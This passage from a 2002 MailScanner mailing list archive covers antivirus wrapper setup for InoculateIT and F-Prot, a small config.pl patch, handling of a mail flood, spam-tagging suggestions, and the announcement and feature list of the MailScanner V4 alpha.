filtering certain file types. [JM] > What user does the sweep command use? can you help ?? Whatever you are running mailscanner as. Another stupid question .... How do I change this?? HTH Nick -- Nick Phillips -- nwp@lemon-computing.com You are not dead yet. But watch for further reports. From hciss at HCIWS.COM Thu Sep 19 18:57:23 2002 From: hciss at HCIWS.COM (Matt) Date: Thu Jan 12 21:15:42 2006 Subject: minor change for Sophos.autoupdate References: <5.1.0.14.2.20020919162445.087f1e98@imap.ecs.soton.ac.uk> <5.1.0.14.2.20020919172429.087e9d00@imap.ecs.soton.ac.uk> Message-ID: <00fb01c26006$04e0b220$6701a8c0@matthew> > At 17:09 19/09/2002, you wrote: > >Is there an autoupdate for F-prot? > > Yes, it comes in /usr/local/f-prot/autoupdate unless I'm very much mistaken... What does this mean? [root f-prot]# perl autoupdate FTP address for retrieving files is ftp://eu-3.updates.f-prot.com/pub/ Unknown fatal error calling "checksum", exiting., Bad file descriptor at autoupd ate line 294, chunk 2. Matt From mailscanner at ecs.soton.ac.uk Fri Sep 20 09:17:11 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:42 2006 Subject: Email Signature In-Reply-To: <000001c25ffd$8a1b3a40$0200000a@mail> Message-ID: <5.1.0.14.2.20020920091650.05c23770@imap.ecs.soton.ac.uk> It will be in V4. First alpha release due "Real Soon Now(tm)". At 17:56 19/09/2002, you wrote: >Hi all, > >As a relative newbie to Mailscanner this question I think may have already >been >answered but...... > >Are there any moves a foot to have MS provide an unique editable signature >by domain. > >Apologies in advance if this is an oldie. > >Regards > >John Walker >Sme-Ecom -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From mailscanner at ecs.soton.ac.uk Fri Sep 20 09:20:46 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:42 2006 Subject: Spam Tagging Suggestion In-Reply-To: <002101c26031$a1665f20$6701a8c0@matthew> Message-ID: <5.1.0.14.2.20020920092041.05bd9aa0@imap.ecs.soton.ac.uk> This is in V4. At 00:09 20/09/2002, you wrote: >I have an idea for spam scanning with Spamassassin. > >Have a setting so it adds a tag to the end of the message if its has over so >many hits. Then have the tag relate how many hits. > >If 5(or whatever set at) hits or more its tagged like so: > >-- >MailScanner Scanned >SpamAssassin - - - - - 5 hits. > >If 12 hits its tagged like so: > >-- >MailScanner Scanned >SpamAssassin - - - - - - - - - - - - 12 hits. > >This way users can setup a rule in Outlook to there liking. If they want >aggressive filtering they can add a rule that if the Body Contains >"SpamAssassin - - - - -" move to "Junk Mail" folder. That 5 hit rule will >also work on anything over 5 hits. If the signature is added to the text >portion of the message and its in html they won't even see it but the >Outlook rules should. They can also add another rule if Body Contains >"SpamAssassin - - - - - - - - - - - -" move to "Trash". > >Hopefully users could ignore the tags at the end if they did not like them. >Its really a shame Outlook cannot look at the headers for mail rules. > >Matthew H -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From mailscanner at ecs.soton.ac.uk Fri Sep 20 09:19:47 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:42 2006 Subject: clamav support for mailscanner (patch) In-Reply-To: <20020919185020.GA2818@wyvern.smop.co.uk> Message-ID: <5.1.0.14.2.20020920091925.05bdb190@imap.ecs.soton.ac.uk> Can you send me a copy once you've got it running well in a production environment please? At 19:50 19/09/2002, you wrote: >Here's a basic parser for clamav (clamav.elektrapro.com). I've unit tested >it with zip archives only (no rar archives etc). Maybe "TryOneCommercial" >should be renamed ;-) > >I havn't actually started using mailscanner yet (I'm about to swap from >amavisd-new having seen the source code ), so this is definitely not >tested in production. > >Hope this is useful for someone - patch attached is against 3.22.13-1 >(debian package), but should apply pretty cleanly (the diff against 3.13 >just failed on one offset). > >I must say, I'm not a great fan of the InitParser/ProcessOutput stuff - any >particular reason why it was done this way (calling it a line at a time - >you could pass it a file desciptor)? > >Adrian > >Email: adrian@smop.co.uk >Windows NT - Unix in beta-testing. GPG/PGP keys available on public key >servers >Debian GNU/Linux -*- By professionals for professionals -*- www.debian.org -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From mailscanner at ecs.soton.ac.uk Fri Sep 20 09:23:17 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:42 2006 Subject: DOS Attack on Mail Server In-Reply-To: <6214C3F9233D764C9E7029396C355015116B1A@mail.foundation.sds u.edu> Message-ID: <5.1.0.14.2.20020920092204.05bda0c0@imap.ecs.soton.ac.uk> At 05:30 20/09/2002, you wrote: >We received about 15,000 messages in about 30 minutes today from a >single source. It turned out to a bug in a website that sent us message >after message after message. I was able to quickly find the source IP >and block it at the firewall but this could have been very bad. It took >me about 20 minutes to realize mail wasn't flowing, and by the time I >logged into the Sendmail gateway, and checked the number of files in >mqueue.in it was somewhere in the 25,000 range. If my cell phone >service was off (I got a page on my cell phone because of the large >queue) it wouldn't have stopped until the users mailbox was full and >started bouncing message. (she was at about 10 mb's of 250. They were >5kb messages I believe so (check my math) it would have taken, 50,000 >messages to fill her up. > >Anyways, my point. Could mailscanner somehow detect this and stop >sendmail from accepting the messages. I'm not sure if it's practical. >Maybe if it breaks a certain number of messages in 10 minutes overall, >by from or to address, from IP, or similar messages. Any thoughts? In your sendmail.cf, set # minimum number of free blocks on filesystem O MinFreeBlocks=500 -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From mailscanner at ecs.soton.ac.uk Fri Sep 20 09:05:03 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:42 2006 Subject: minor change for Sophos.autoupdate In-Reply-To: <00fb01c26006$04e0b220$6701a8c0@matthew> References: <5.1.0.14.2.20020919162445.087f1e98@imap.ecs.soton.ac.uk> <5.1.0.14.2.20020919172429.087e9d00@imap.ecs.soton.ac.uk> Message-ID: <5.1.0.14.2.20020920090430.04874e80@imap.ecs.soton.ac.uk> At 18:57 19/09/2002, you wrote: > > At 17:09 19/09/2002, you wrote: > > >Is there an autoupdate for F-prot? > > > > Yes, it comes in /usr/local/f-prot/autoupdate unless I'm very much >mistaken... > >What does this mean? > >[root f-prot]# perl autoupdate >FTP address for retrieving files is ftp://eu-3.updates.f-prot.com/pub/ >Unknown fatal error calling "checksum", exiting., Bad file descriptor at >autoupd >ate line 294, chunk 2. It means that when you unpacked the f-prot package, you didn't copy the program "checksum" into /usr/local/f-prot. -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From mailscanner at ecs.soton.ac.uk Fri Sep 20 09:18:57 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:42 2006 Subject: minor change for Sophos.autoupdate In-Reply-To: <200209200403020493.1AC258B3@smtp1.ace.net.au> References: <5.1.0.14.2.20020919172429.087e9d00@imap.ecs.soton.ac.uk> <5.1.0.14.2.20020919162445.087f1e98@imap.ecs.soton.ac.uk> <5.1.0.14.2.20020919172429.087e9d00@imap.ecs.soton.ac.uk> Message-ID: <5.1.0.14.2.20020920091739.05bda788@imap.ecs.soton.ac.uk> At 19:33 19/09/2002, you wrote: >What is the difference between running that and check-updates.sh ? My autoupdate script locks out MailScanner while the update is happening. If you use check-updates.sh and you get an email coming in while it is running, you may let a virus or two in as MailScanner will try to run the update script when it is "half installed". -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From email-ian at POST1.COM Fri Sep 20 09:56:23 2002 From: email-ian at POST1.COM (Ian Ee) Date: Thu Jan 12 21:15:42 2006 Subject: InoculateIT and Mailscanner References: <000201c2607b$45ee6350$6401a8c0@jamesdesktop> Message-ID: <008801c26083$99e5c630$8500a8c0@xyz> Hi James, I've got InoculateIT and Mailscanner to run correctly RH7.3 by making some changes to the wrapper script and creating a symbolic link. 1. Edit the wrapper script (mine is called inowrapper, f-prot user will have this as f-protwrapper), uncomment the option header "LD_LIBRARY_PATH=" and "export LD_LIBRARY_PATH" so it look something like this: LD_LIBRARY_PATH=/ino/lib:/ino/config:/ino/secu/lib export LD_LIBRARY_PATH 2. Create symbolic link for file /ino/config/libarclib.so in /ino/lib This tweak has got my production server up and running again, I guess RH7.3 works different. Kind regards, Ian. ----- Original Message ----- From: "James Murchison" To: Sent: Friday, September 20, 2002 3:56 PM Subject: Re: InoculateIT and Mailscanner > Nick, > > Firstly thanks for taking an interest in my problem. I think if I can > get Mailscanner to run as root, this will fix my problem. Any hints you > know of?? > > See below for other answers. > > On Fri, Sep 20, 2002 at 09:16:44AM +1000, James Murchison wrote: > > > I have been running Mailscanner for 12 Months on RedHat 7.0 with > > InoculateIT no problems. Recently we introduced a new mail server, > > Redhat 7.3 and InoculteIT 6.0. I have the latest version (3.22-14) of > > Mailscanner installed. I am having an issue with INO6.0, it comes up > > with a libarclib shared library problem when the sweep is run. > > What's the exact problem/error message/output? > > The exact error is : error in loading shared libraries: libarclib.so: > cannot open shared object file: No Such file or directory > I was able to duplicate this error by logging in as a non root user. > Then running the command (inocmd32). As soon as I logged in as root the > problem goes away. > > The exact problem is : When the virus scanner is invoked it returns the > above error, then proceeds to continue processing without scanning for > viruses. > > > I have visted the mailing lists and seen there are numerous people who > > > have addressed this problem with AMVIS (InoculateIT will not accept > > anything, but the root user). I have tried to adapt to Mailscanner > > with no success. > > You mean Inoculate won't run *at all* unless it's root? By design? Or > just by accident? > > By design.... CA have advised this will not change. [JM] > > What use are you running mailscanner as? > > I use Mailscanner to prescan multiple email domains for viruses and > filtering certain file types. [JM] > > > > What user does the sweep command use? can you help ?? > > Whatever you are running mailscanner as. > > Another stupid question .... How do I change this?? > > > HTH > > > Nick > -- > Nick Phillips -- nwp@lemon-computing.com > You are not dead yet. But watch for further reports. > From funk.gabor at HUNETKFT.HU Fri Sep 20 10:12:08 2002 From: funk.gabor at HUNETKFT.HU (Funk Gabor) Date: Thu Jan 12 21:15:42 2006 Subject: InoculateIT and Mailscanner References: <000201c2607b$45ee6350$6401a8c0@jamesdesktop> Message-ID: <003701c26085$cc3a87e0$2c8bded5@chello.hu> > The exact error is : error in loading shared libraries: libarclib.so: > cannot open shared object file: No Such file or directory > I was able to duplicate this error by logging in as a non root user. > Then running the command (inocmd32). As soon as I logged in as root the > problem goes away. Complaining about the shared files can mean that indeed it can't find the shared files (permission problems?), otherwise yes, it won't run as non-root, but it should say "inocmd32 may only be used by the root user". > You mean Inoculate won't run *at all* unless it's root? By design? Or > just by accident? > > By design.... CA have advised this will not change. [JM] Yes. I've been throu' on this with CA. You can read their reply at: http://sourceforge.net/tracker/index.php?func=detail&aid=460388&group_id=600 6&atid=106006 [link may break] It was also posted to this list by that time. I use exim, which dislikes to run as root, but I also find a pretty bad idea. to run anything as root. I haven't tried but you can try sweep = "sudo inocmd32 ..." Read the above link for ideas, and keep us posted. G. www.hunetkft.hu From mailscanner at ecs.soton.ac.uk Fri Sep 20 12:14:45 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:42 2006 Subject: Patch for 3.22-14 Message-ID: <5.1.0.14.2.20020920121338.04692128@imap.ecs.soton.ac.uk> There's a little bug in the "Archive Mail" feature when you want to archive mail for an email address that contains a "." before the "@". If this is a problem for you, please apply this patch to config.pl --- config.pl.old Fri Sep 20 11:52:18 2002 +++ config.pl Fri Sep 20 11:52:23 2002 @@ -559,6 +559,7 @@ s/^\s*//g; # and leading and s/\s*$//g; # trailing spaces next if /^$/; # and blank lines + s/^([^@]+@([-a-z0-9]+(\.[-a-z0-9+]+)+)).*$/$1/i or s/^([-a-z0-9]+(\.[-a-z0-9]+)+).*$/$1/i; # Use the 1st domain name #s/\s.*$//g; # Just use the first word # Store wildcards separately for speed -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From ucs_rat at SHSU.EDU Fri Sep 20 13:04:49 2002 From: ucs_rat at SHSU.EDU (Robert A. Thompson) Date: Thu Jan 12 21:15:42 2006 Subject: Spam Tagging Suggestion In-Reply-To: <5.1.0.14.2.20020920092041.05bd9aa0@imap.ecs.soton.ac.uk> References: <5.1.0.14.2.20020920092041.05bd9aa0@imap.ecs.soton.ac.uk> Message-ID: <1032523489.21862.8.camel@localhost.localdomain> you could put filters in outlook to do this with the x- headers now. It is what we are doing at our location. --Robert On Fri, 2002-09-20 at 03:20, Julian Field wrote: > This is in V4. > > At 00:09 20/09/2002, you wrote: > >I have an idea for spam scanning with Spamassassin. > > > >Have a setting so it adds a tag to the end of the message if its has over so > >many hits. Then have the tag relate how many hits. > > > >If 5(or whatever set at) hits or more its tagged like so: > > > >-- > >MailScanner Scanned > >SpamAssassin - - - - - 5 hits. > > > >If 12 hits its tagged like so: > > > >-- > >MailScanner Scanned > >SpamAssassin - - - - - - - - - - - - 12 hits. > > > >This way users can setup a rule in Outlook to there liking. If they want > >aggressive filtering they can add a rule that if the Body Contains > >"SpamAssassin - - - - -" move to "Junk Mail" folder. That 5 hit rule will > >also work on anything over 5 hits. If the signature is added to the text > >portion of the message and its in html they won't even see it but the > >Outlook rules should. They can also add another rule if Body Contains > >"SpamAssassin - - - - - - - - - - - -" move to "Trash". > > > >Hopefully users could ignore the tags at the end if they did not like them. > >Its really a shame Outlook cannot look at the headers for mail rules. > > > >Matthew H > > -- > Julian Field Teaching Systems Manager > jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science > Tel. 023 8059 2817 University of Southampton > Southampton SO17 1BJ From mailscanner at ecs.soton.ac.uk Fri Sep 20 14:39:46 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:42 2006 Subject: ANNOUNCE: First alpha release of V4 Message-ID: <5.1.0.14.2.20020920143609.04ad8f90@imap.ecs.soton.ac.uk> Okay folks, here's the first tentative version of V4. Important: ======== Do **NOT** touch this if you need an RPM to install anything. There isn't one. And there won't be until it's ready for final release. If you have to have RPMs to do anything then you don't know enough to be trying this out anyway. There is no Exim support. There is no Postfix support. There is no documentation apart from that contained in the *.conf files and the "etc/rules" directory. The tar archive will unpack most easily into /opt as the default paths refer to /opt/MailScanner. Download it as usual from www.mailscanner.info. All constructive comments are welcome. If you can, please put "V4" at the start of the subject line so I can filter them easily. Tell me what you think! -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From sevans at FOUNDATION.SDSU.EDU Fri Sep 20 14:51:40 2002 From: sevans at FOUNDATION.SDSU.EDU (Steve Evans) Date: Thu Jan 12 21:15:42 2006 Subject: DOS Attack on Mail Server Message-ID: <6214C3F9233D764C9E7029396C3550153314D7@mail.foundation.sdsu.edu> That's the problem. My MailScanner box is just a SMTP relay for my iPlanet mail server. For it to run out of disk space would take a whole lot. And legitimate mail is waiting in line with all the crap in the mean time. Steve Evans (619) 594-0653 -----Original Message----- From: Julian Field [mailto:mailscanner@ECS.SOTON.AC.UK] Sent: Friday, September 20, 2002 1:23 AM To: MAILSCANNER@JISCMAIL.AC.UK Subject: Re: DOS Attack on Mail Server At 05:30 20/09/2002, you wrote: >We received about 15,000 messages in about 30 minutes today from a >single source. It turned out to a bug in a website that sent us >message after message after message. I was able to quickly find the >source IP and block it at the firewall but this could have been very >bad. It took me about 20 minutes to realize mail wasn't flowing, and >by the time I logged into the Sendmail gateway, and checked the number >of files in mqueue.in it was somewhere in the 25,000 range. If my cell >phone service was off (I got a page on my cell phone because of the >large >queue) it wouldn't have stopped until the users mailbox was full and >started bouncing message. (she was at about 10 mb's of 250. They were >5kb messages I believe so (check my math) it would have taken, 50,000 >messages to fill her up. > >Anyways, my point. Could mailscanner somehow detect this and stop >sendmail from accepting the messages. I'm not sure if it's practical. >Maybe if it breaks a certain number of messages in 10 minutes overall, >by from or to address, from IP, or similar messages. Any thoughts? In your sendmail.cf, set # minimum number of free blocks on filesystem O MinFreeBlocks=500 -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From gerry at dorfam.ca Fri Sep 20 15:07:18 2002 From: gerry at dorfam.ca (Gerry Doris) Date: Thu Jan 12 21:15:42 2006 Subject: DOS Attack on Mail Server In-Reply-To: <20020920071629.GE6315@hoiho.nz.lemon-computing.com> References: <6214C3F9233D764C9E7029396C355015116B1A@mail.foundation.sdsu.edu> <20020920071629.GE6315@hoiho.nz.lemon-computing.com> Message-ID: <52369.129.80.22.134.1032530838.squirrel@tiger.dorfam.ca> > On Thu, Sep 19, 2002 at 09:30:55PM -0700, Steve Evans wrote: > >> Anyways, my point. Could mailscanner somehow detect this and stop >> sendmail from accepting the messages. > > > No, but sendmail (and Exim and any other decent MTA) can be configured > to refuse connections when the disk is too full. > > > Cheers, > > > Nick I seem to be attracting all the internet nuts these days??? The night before last the lastest nut (I think it's him) tried to crash my mail server using some kind of mail bomb script. Just after 4:00am my logs show that suddenly sendmail's load increased to 12 and sendmail stopped receiving for 15 seconds. This happened several times in a row but didn't have any lasting effects. The same situation occurred at 6:00am and then again at 12:00 noon. The default sendmail config handled the nonsense in stride. It looks like the script used just openned the hand shaking repeatedly as there wasn't any other indication in the logs (ip address etc) of what had occurred other than the sendmail notices about load max'ing out. Gerry From gdr at GNO.ORG Fri Sep 20 15:38:58 2002 From: gdr at GNO.ORG (Devin Reade) Date: Thu Jan 12 21:15:42 2006 Subject: MailScanner 3.x with OpenAntiVirus Message-ID: <5070000.1032532738@[192.168.50.4]> The following URL describes how to use MailScanner with the OpenAntiVirus ScannerDaemon: Julian, the patches are essentially the same as the ones I sent you in private email a while back. I've added a few scripts and some description of the procedure, as you suggested. -- Devin Reade From hciss at HCIWS.COM Fri Sep 20 15:57:36 2002 From: hciss at HCIWS.COM (Matt) Date: Thu Jan 12 21:15:42 2006 Subject: Spam Tagging Suggestion References: <5.1.0.14.2.20020920092041.05bd9aa0@imap.ecs.soton.ac.uk> <1032523489.21862.8.camel@localhost.localdomain> Message-ID: <001801c260b6$118c0aa0$6701a8c0@matthew> > you could put filters in outlook to do this with the x- headers now. It > is what we are doing at our location. How? I do not see that anywhere in Outlook Express rules? Matt > > >I have an idea for spam scanning with Spamassassin. > > > > > >Have a setting so it adds a tag to the end of the message if its has over so > > >many hits. Then have the tag relate how many hits. > > > > > >If 5(or whatever set at) hits or more its tagged like so: > > > > > >-- > > >MailScanner Scanned > > >SpamAssassin - - - - - 5 hits. > > > > > >If 12 hits its tagged like so: > > > > > >-- > > >MailScanner Scanned > > >SpamAssassin - - - - - - - - - - - - 12 hits. > > > > > >This way users can setup a rule in Outlook to there liking. If they want > > >aggressive filtering they can add a rule that if the Body Contains > > >"SpamAssassin - - - - -" move to "Junk Mail" folder. That 5 hit rule will > > >also work on anything over 5 hits. If the signature is added to the text > > >portion of the message and its in html they won't even see it but the > > >Outlook rules should. They can also add another rule if Body Contains > > >"SpamAssassin - - - - - - - - - - - -" move to "Trash". > > > > > >Hopefully users could ignore the tags at the end if they did not like them. > > >Its really a shame Outlook cannot look at the headers for mail rules. From P.G.M.Peters at civ.utwente.nl Fri Sep 20 16:23:38 2002 From: P.G.M.Peters at civ.utwente.nl (Peter Peters) Date: Thu Jan 12 21:15:42 2006 Subject: Spam Tagging Suggestion In-Reply-To: <001801c260b6$118c0aa0$6701a8c0@matthew> References: <5.1.0.14.2.20020920092041.05bd9aa0@imap.ecs.soton.ac.uk> <1032523489.21862.8.camel@localhost.localdomain> <001801c260b6$118c0aa0$6701a8c0@matthew> Message-ID: On Fri, 20 Sep 2002 09:57:36 -0500, you wrote: >> you could put filters in outlook to do this with the x- headers now. It >> is what we are doing at our location. > >How? I do not see that anywhere in Outlook Express rules? That's right. It is not included in Outlook Express. Only Outlook (and every version a bit different) has this possibility. -- Peter Peters senior netwerkbeheerder, Centrum voor Informatievoorziening, Universiteit Twente, Postbus 217, 7500 AE Enschede telefoon: +31 53 489 2301, fax:+31 53 489 2383, http://www.utwente.nl/civ From mailscanner at ecs.soton.ac.uk Fri Sep 20 17:30:49 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:42 2006 Subject: What's New in V4 alpha 1 In-Reply-To: <5.1.0.14.2.20020920143609.04ad8f90@imap.ecs.soton.ac.uk> Message-ID: <5.1.0.14.2.20020920172612.04b411c0@imap.ecs.soton.ac.uk> Here's the "What's New" list. It may not be complete, and some of the features are far more flexible than I can give space to here, but it should give you a flavour of what is new in this release. - Completely redesigned and rewritten from scratch - Multiple concurrent scanning processes makes it run much faster as all the CPU's in the server can be fully loaded at all times - Virtually all configuration options can have their value calculated from a ruleset allowing you to set different values depending on the From: address, the To: address or the IP address of the computer sending you the message - Support for 12 virus scanners: Sophos, McAfee, Command, Kaspersky, Inoculate, Inoculan, Nod32, F-Secure, F-Prot, Panda, RAV and AntiVir. - Can report messages back to people who sent you spam, explaining what detected it as spam. Different messages depending on whether it triggered an RBL, SpamAssassin or both. - Complete hiding of directory paths in virus reports sent to users, so as not to confuse them or give away configuration information about your servers - A header can be added to every message indicating the SpamAssassin score by giving 1 character per point, so a message with a score of 7 would contain "sssssss" in the header (the character is configurable). - Notices about viruses no longer have to go to the local postmaster, they can go to any address - All messages sent back to senders are created so that they cannot bounce, but can be replied to - Messages already signed as being clean will not be re-signed by another MailScanner server on your site (but they will still be scanned) - Actions to take when a message is detected as being spam include any combination of "deliver" it to the intended recipient as normal "store" it in the spam archive "delete" it altogether "bounce" it back to the sender by sending them a warning message "forward" it to any other email addresses - Completely separate set of actions can be used when the message scores above a certain SpamAssassin "High Score" threshold - Mail for any group of users can be archived to a directory or forwarded onto another address. The original recipient should not be able to detect this has happened, if you choose not to tell them - Spam whitelists and blacklists can be far more complex than before, if you need them to be - Not only can you choose a list of addresses whose mail you want to scan, you can also choose a list of addresses whose mail you do not want to scan - You can choose not to run SpamAssassin on messages that have already triggered an RBL blacklist -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From brandonf at BFCONSULT.CO.ZA Fri Sep 20 17:36:12 2002 From: brandonf at BFCONSULT.CO.ZA (Brandon Friedman) Date: Thu Jan 12 21:15:42 2006 Subject: What's New in V4 alpha 1 References: <5.1.0.14.2.20020920172612.04b411c0@imap.ecs.soton.ac.uk> Message-ID: <3D8B4E7C.5050306@bfconsult.co.za> Just one question: Is there support for other MTA's? Exim, qmail etc...? Julian Field wrote: > Here's the "What's New" list. It may not be complete, and some of the > features are far more flexible than I can give space to here, but it should > give you a flavour of what is new in this release. > > - Completely redesigned and rewritten from scratch > > - Multiple concurrent scanning processes makes it run much faster as all > the CPU's in the server can be fully loaded at all times > > - Virtually all configuration options can have their value calculated from > a ruleset allowing you to set different values depending on the From: > address, the To: address or the IP address of the computer sending you > the message > > - Support for 12 virus scanners: > Sophos, McAfee, Command, Kaspersky, Inoculate, Inoculan, Nod32, F-Secure, > F-Prot, Panda, RAV and AntiVir. > > - Can report messages back to people who sent you spam, explaining what > detected it as spam. Different messages depending on whether it triggered > an RBL, SpamAssassin or both. > > - Complete hiding of directory paths in virus reports sent to users, so > as not to confuse them or give away configuration information about your > servers > > - A header can be added to every message indicating the SpamAssassin score > by giving 1 character per point, so a message with a score of 7 would > contain "sssssss" in the header (the character is configurable). > > - Notices about viruses no longer have to go to the local postmaster, they > can go to any address > > - All messages sent back to senders are created so that they cannot bounce, > but can be replied to > > - Messages already signed as being clean will not be re-signed by another > MailScanner server on your site (but they will still be scanned) > > - Actions to take when a message is detected as being spam include any > combination of > "deliver" it to the intended recipient as normal > "store" it in the spam archive > "delete" it altogether > "bounce" it back to the sender by sending them a warning message > "forward" it to any other email addresses > > - Completely separate set of actions can be used when the message scores > above a certain SpamAssassin "High Score" threshold > > - Mail for any group of users can be archived to a directory or forwarded > onto another address. The original recipient should not be able to > detect this has happened, if you choose not to tell them > > - Spam whitelists and blacklists can be far more complex than before, if > you need them to be > > - Not only can you choose a list of addresses whose mail you want to scan, > you can also choose a list of addresses whose mail you do not want to > scan > > - You can choose not to run SpamAssassin on messages that have already > triggered an RBL blacklist > > -- > Julian Field Teaching Systems Manager > jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science > Tel. 023 8059 2817 University of Southampton > Southampton SO17 1BJ > -- Regards Brandon Friedman Cell:083 408 7840 E-mail: brandonf@bfconsult.co.za www.bfconsult.co.za From brandonf at BFCONSULT.CO.ZA Fri Sep 20 17:37:43 2002 From: brandonf at BFCONSULT.CO.ZA (Brandon Friedman) Date: Thu Jan 12 21:15:43 2006 Subject: What's New in V4 alpha 1 References: <5.1.0.14.2.20020920172612.04b411c0@imap.ecs.soton.ac.uk> <3D8B4E7C.5050306@bfconsult.co.za> Message-ID: <3D8B4ED7.4010402@bfconsult.co.za> Ooooopss sorry I meant postfix!!! Brandon Friedman wrote: > Just one question: > > Is there support for other MTA's? Exim, qmail etc...? > > Julian Field wrote: > >> Here's the "What's New" list. It may not be complete, and some of the >> features are far more flexible than I can give space to here, but it >> should >> give you a flavour of what is new in this release. >> >> - Completely redesigned and rewritten from scratch >> >> - Multiple concurrent scanning processes makes it run much faster as all >> the CPU's in the server can be fully loaded at all times >> >> - Virtually all configuration options can have their value calculated >> from >> a ruleset allowing you to set different values depending on the From: >> address, the To: address or the IP address of the computer sending you >> the message >> >> - Support for 12 virus scanners: >> Sophos, McAfee, Command, Kaspersky, Inoculate, Inoculan, Nod32, >> F-Secure, >> F-Prot, Panda, RAV and AntiVir. >> >> - Can report messages back to people who sent you spam, explaining what >> detected it as spam. Different messages depending on whether it >> triggered >> an RBL, SpamAssassin or both. >> >> - Complete hiding of directory paths in virus reports sent to users, so >> as not to confuse them or give away configuration information about >> your >> servers >> >> - A header can be added to every message indicating the SpamAssassin >> score >> by giving 1 character per point, so a message with a score of 7 would >> contain "sssssss" in the header (the character is configurable). >> >> - Notices about viruses no longer have to go to the local postmaster, >> they >> can go to any address >> >> - All messages sent back to senders are created so that they cannot >> bounce, >> but can be replied to >> >> - Messages already signed as being clean will not be re-signed by another >> MailScanner server on your site (but they will still be scanned) >> >> - Actions to take when a message is detected as being spam include any >> combination of >> "deliver" it to the intended recipient as normal >> "store" it in the spam archive >> "delete" it altogether >> "bounce" it back to the sender by sending them a warning message >> "forward" it to any other email addresses >> >> - Completely separate set of actions can be used when the message scores >> above a certain SpamAssassin "High Score" threshold >> >> - Mail for any group of users can be archived to a directory or forwarded >> onto another address. The original recipient should not be able to >> detect this has happened, if you choose not to tell them >> >> - Spam whitelists and blacklists can be far more complex than before, if >> you need them to be >> >> - Not only can you choose a list of addresses whose mail you want to >> scan, >> you can also choose a list of addresses whose mail you do not want to >> scan >> >> - You can choose not to run SpamAssassin on messages that have already >> triggered an RBL blacklist >> >> -- >> Julian Field Teaching Systems Manager >> jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science >> Tel. 023 8059 2817 University of Southampton >> Southampton SO17 1BJ >> > > > -- > > Regards > Brandon Friedman > Cell:083 408 7840 > E-mail: brandonf@bfconsult.co.za > www.bfconsult.co.za > -- Regards Brandon Friedman Cell:083 408 7840 E-mail: brandonf@bfconsult.co.za www.bfconsult.co.za From mailscanner at ecs.soton.ac.uk Fri Sep 20 17:44:42 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:43 2006 Subject: What's New in V4 alpha 1 In-Reply-To: <3D8B4E7C.5050306@bfconsult.co.za> References: <5.1.0.14.2.20020920172612.04b411c0@imap.ecs.soton.ac.uk> Message-ID: <5.1.0.14.2.20020920174354.0454fff0@imap.ecs.soton.ac.uk> At 17:36 20/09/2002, you wrote: >Just one question: > >Is there support for other MTA's? Exim, qmail etc...? Nothing except sendmail at the moment. Exim will obviously happen when Nick gets a chance, and he is also intending to add support for Postfix. Qmail is questionable, we'll have to wait and see what the job looks like... >Julian Field wrote: > >>Here's the "What's New" list. It may not be complete, and some of the >>features are far more flexible than I can give space to here, but it should >>give you a flavour of what is new in this release. >> >>- Completely redesigned and rewritten from scratch >> >>- Multiple concurrent scanning processes makes it run much faster as all >> the CPU's in the server can be fully loaded at all times >> >>- Virtually all configuration options can have their value calculated from >> a ruleset allowing you to set different values depending on the From: >> address, the To: address or the IP address of the computer sending you >> the message >> >>- Support for 12 virus scanners: >> Sophos, McAfee, Command, Kaspersky, Inoculate, Inoculan, Nod32, F-Secure, >> F-Prot, Panda, RAV and AntiVir. >> >>- Can report messages back to people who sent you spam, explaining what >> detected it as spam. Different messages depending on whether it triggered >> an RBL, SpamAssassin or both. >> >>- Complete hiding of directory paths in virus reports sent to users, so >> as not to confuse them or give away configuration information about your >> servers >> >>- A header can be added to every message indicating the SpamAssassin score >> by giving 1 character per point, so a message with a score of 7 would >> contain "sssssss" in the header (the character is configurable). >> >>- Notices about viruses no longer have to go to the local postmaster, they >> can go to any address >> >>- All messages sent back to senders are created so that they cannot bounce, >> but can be replied to >> >>- Messages already signed as being clean will not be re-signed by another >> MailScanner server on your site (but they will still be scanned) >> >>- Actions to take when a message is detected as being spam include any >> combination of >> "deliver" it to the intended recipient as normal >> "store" it in the spam archive >> "delete" it 